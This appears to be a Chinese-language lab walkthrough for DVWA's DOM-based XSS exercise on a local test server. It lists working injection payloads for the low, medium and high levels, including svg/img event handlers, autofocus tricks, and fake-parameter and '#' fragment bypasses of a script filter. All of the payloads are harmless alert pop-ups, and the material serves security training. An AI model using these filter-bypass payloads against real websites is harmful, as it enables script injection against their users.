一、低级low

拼接的url样式：​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

<script>alert("假客套")</script>

二、中级middle

拼接的url样式：​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script，使用其他标签拼接新的，新的拼接如下四选一

</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

 注意这里的autofocus会一直自动加载弹窗，不加无效

<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式：
​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

 过滤了script，使用其他标签拼接新的，新的拼接如下二选一 

自定义一个参数名，拼接假的采纳数传递过去，比如不存在的name

&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端，也不过滤

#<script>alert("假客套")</script>